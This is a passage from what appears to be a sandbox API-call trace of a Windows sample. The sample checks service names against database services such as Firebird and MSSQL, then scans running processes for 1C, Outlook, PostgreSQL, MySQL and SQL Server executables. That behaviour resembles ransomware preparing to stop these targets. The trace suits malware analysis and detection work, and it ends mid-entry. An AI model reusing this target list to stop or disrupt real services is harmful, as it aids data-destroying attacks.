lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0257.906] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0257.906] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0257.906] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0257.906] lstrlenW (lpString="DPS") returned 3 [0257.907] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0257.907] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0257.907] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0257.907] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0257.907] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0257.907] lstrlenW (lpString="eventlog") returned 8 [0257.907] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0257.907] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0257.907] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0257.907] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0257.907] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0257.907] lstrlenW (lpString="EventSystem") returned 11 [0257.907] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0257.907] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0257.907] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0257.907] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0257.907] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0257.907] lstrlenW (lpString="gpsvc") returned 5 [0257.907] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0257.907] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0257.907] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0257.907] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0257.907] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0257.907] lstrlenW (lpString="LanmanWorkstation") returned 17 [0257.907] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0257.907] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0257.907] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0257.907] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0257.907] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0257.907] lstrlenW (lpString="lmhosts") returned 7 [0257.907] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0257.907] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0257.907] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0257.907] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0257.908] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0257.908] lstrlenW (lpString="MMCSS") returned 5 [0257.908] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0257.908] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0257.908] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0257.908] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0257.908] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0257.908] lstrlenW (lpString="MpsSvc") returned 6 [0257.908] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0257.908] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0257.908] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0257.908] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0257.908] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0257.908] lstrlenW (lpString="NlaSvc") returned 6 [0257.908] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0257.908] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0257.908] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0257.908] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0257.908] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0257.908] lstrlenW (lpString="nsi") returned 3 [0257.908] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0257.908] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0257.908] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0257.908] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0257.908] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0257.908] lstrlenW (lpString="PcaSvc") returned 6 [0257.908] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0257.908] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0257.908] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0257.908] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0257.908] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0257.908] lstrlenW (lpString="PlugPlay") returned 8 [0257.908] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0257.908] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0257.909] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0257.909] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0257.909] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0257.909] lstrlenW (lpString="Power") returned 5 [0257.909] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0257.909] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0257.909] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0257.909] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0257.909] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0257.909] lstrlenW (lpString="ProfSvc") returned 7 [0257.909] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0257.909] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0257.909] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0257.909] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0257.909] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0257.909] lstrlenW (lpString="RpcEptMapper") returned 12 [0257.909] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0257.909] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0257.909] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0257.909] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0257.909] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0257.909] lstrlenW (lpString="RpcSs") returned 5 [0257.909] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0257.909] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0257.909] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0257.909] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0257.909] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0257.909] lstrlenW (lpString="SamSs") returned 5 [0257.909] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0257.909] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0257.909] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0257.909] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0257.909] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0257.909] lstrlenW (lpString="Schedule") returned 8 [0257.910] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0257.910] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0257.910] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0257.910] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0257.910] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0257.910] lstrlenW (lpString="SENS") returned 4 [0257.910] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0257.910] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0257.910] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0257.910] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0257.910] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0257.910] lstrlenW (lpString="ShellHWDetection") returned 16 [0257.910] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0257.910] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0257.910] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0257.910] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0257.910] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0257.910] lstrlenW (lpString="Spooler") returned 7 [0257.910] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0257.910] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0257.910] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0257.910] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0257.910] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0257.910] lstrlenW (lpString="SysMain") returned 7 [0257.910] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0257.910] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0257.910] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0257.910] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0257.910] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0257.910] lstrlenW (lpString="Themes") returned 6 [0257.910] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0257.910] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0257.910] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0257.911] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0257.911] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0257.911] lstrlenW (lpString="UxSms") returned 5 [0257.911] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0257.911] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0257.911] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0257.911] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0257.911] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0257.911] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0x3dec5a0 | out: hHeap=0xb00000) returned 1 [0257.911] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3b0 [0257.912] Process32FirstW (in: hSnapshot=0x3b0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0257.912] Process32NextW (in: hSnapshot=0x3b0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0257.912] lstrlenW (lpString="System") returned 6 [0257.912] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0257.912] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0257.912] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0257.912] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0257.912] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0257.912] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0257.912] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0257.912] Process32NextW (in: hSnapshot=0x3b0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0257.913] lstrlenW (lpString="smss.exe") returned 8 [0257.913] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0257.913] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0257.913] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0257.913] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0257.913] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0257.913] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0257.913] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0257.913] Process32NextW (in: hSnapshot=0x3b0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0257.913] lstrlenW (lpString="csrss.exe") returned 9 [0257.913] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0257.913] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0257.913] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0257.913] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0257.913] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0257.913] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0257.913] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0257.913] Process32NextW (in: hSnapshot=0x3b0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0257.914] lstrlenW (lpString="wininit.exe") returned 11 [0257.914] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0257.914] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0257.914] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0257.914] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0257.914] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0257.914] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0257.914] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0257.914] Process32NextW (in: hSnapshot=0x3b0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0257.914] lstrlenW (lpString="csrss.exe") returned 9 [0257.914] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0257.914] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0257.914] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0257.914] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0257.914] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0257.914] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0257.914] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0257.914] Process32NextW (in: hSnapshot=0x3b0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0257.915] lstrlenW (lpString="winlogon.exe") returned 12 [0257.915] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0257.915] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0257.915] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0257.915] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0257.915] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0257.915] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0257.915] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0257.915] Process32NextW (in: hSnapshot=0x3b0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0257.915] lstrlenW (lpString="services.exe") returned 12 [0257.915] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0257.915] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0257.915] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0257.915] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0257.915] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0257.915] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0257.915] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0257.915] Process32NextW (in: hSnapshot=0x3b0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x180, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0257.916] lstrlenW (lpString="lsass.exe") returned 9 [0257.916] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0257.916] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0257.916] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0257.916] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0257.916] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0257.916] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0257.916] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0257.916] Process32NextW (in: hSnapshot=0x3b0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0257.916] lstrlenW (lpString="lsm.exe") returned 7 [0257.916] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0257.916] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0257.916] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0257.916] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0257.916] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0257.916] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0257.916] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0257.916] Process32NextW (in: hSnapshot=0x3b0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.917] lstrlenW (lpString="svchost.exe") returned 11 [0257.917] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0257.917] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0257.917] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0257.917] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0257.917] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0257.917] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0257.917] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0257.917] Process32NextW (in: hSnapshot=0x3b0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.917] lstrlenW (lpString="svchost.exe") returned 11 [0257.917] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0257.917] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0257.917] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0257.917] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0257.917] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0257.917] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0257.917] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0257.917] Process32NextW (in: hSnapshot=0x3b0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.918] lstrlenW (lpString="svchost.exe") returned 11 [0257.918] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0257.918] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0257.918] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0257.918] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0257.918] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0257.918] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0257.918] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0257.918] Process32NextW (in: hSnapshot=0x3b0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.918] lstrlenW (lpString="svchost.exe") returned 11 [0257.918] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0257.918] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0257.918] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0257.918] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0257.918] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0257.918] Process32NextW (in: hSnapshot=0x3b0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.918] lstrlenW (lpString="svchost.exe") returned 11 [0257.919] Process32NextW (in: hSnapshot=0x3b0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0257.919] lstrlenW (lpString="audiodg.exe") returned 11 [0257.919] Process32NextW (in: hSnapshot=0x3b0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.919] lstrlenW (lpString="svchost.exe") returned 11 [0257.919] Process32NextW (in: hSnapshot=0x3b0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.919] lstrlenW (lpString="svchost.exe") returned 11 [0257.919] Process32NextW (in: hSnapshot=0x3b0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0257.920] lstrlenW (lpString="userinit.exe") returned 12 [0257.920] Process32NextW (in: hSnapshot=0x3b0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x340, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0257.920] lstrlenW (lpString="dwm.exe") returned 7 [0257.920] Process32NextW (in: hSnapshot=0x3b0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x448, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0257.920] lstrlenW (lpString="explorer.exe") returned 12 [0257.920] Process32NextW (in: hSnapshot=0x3b0, lppe=0xa7fd34 | out: 